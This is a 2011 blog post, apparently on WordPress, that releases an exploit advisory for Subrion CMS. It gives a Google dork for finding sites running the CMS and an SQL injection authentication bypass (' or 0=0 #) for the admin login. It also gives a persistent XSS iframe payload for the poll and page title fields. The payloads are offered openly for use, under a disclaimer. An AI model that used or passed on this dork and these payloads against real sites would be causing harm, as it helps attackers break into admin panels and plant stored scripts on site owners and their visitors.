Subrion CMS multiple vulnerabilities ~3xpl0it~

Hi folks,

Releasing my first exploit today about Subrion CMS multiple vulnerabilities. You can check-in exploit-db, inj3ct0r and packetstormsecurity too for the exploit. Here, I am posting my first exploit for you to go through.

Disclaimer: The author isn’t responsible for any misuse of this exploit. This is posted here for a conceptual understanding of multiple vulnerabilities that can occur within a single site. Hack to learn, but dont learn to hack.

Peace \m/

Here’s the 3xpl0it:

SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com
Author: Karthik R (3psil0nLambDa)
Email:  Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork:  © 2011 Powered by Subrion CMS 

Description about the CMS

Subrion CMS unites the functionality of articles script, auto 
classifieds script,realty classifieds script, and web directory
script all in one package. Subrion's highly scalable set of key
features makes it a powerful platform for web sites. Subrion CMS
is easy to install and simple to manage. Use it as a stand-alone
application or in conjunction with other applications to create 
entry level sites, mid-sized or large sites. You can be confident
that you will be able to invest in this system and continue to
grow it to any possible level.
Exploits:
SQLi Vulnerability

The attackers can use the authentication bypass to get in to the
admin panel in the site.

Exploit: Username: ' or 0=0 #
	 Password: ' or 0=0 #
Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS
in the title field.
Exploit: 
%22%3E%3CIFRAME SRC="javascript:alert('XSS');%22%3E%3C/IFRAME%3E
----------------------------------------------------------
Greets and tribute to: side^effects and my love taashu
----------------------------------------------------------
This can be further extended depending on your arsenal.
Until next time, 3ps!l0nLaMbDa signing off. \m/
 
About these ads

Posted on June 11, 2011, in Uncategorized. Bookmark the permalink. 2 Comments.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: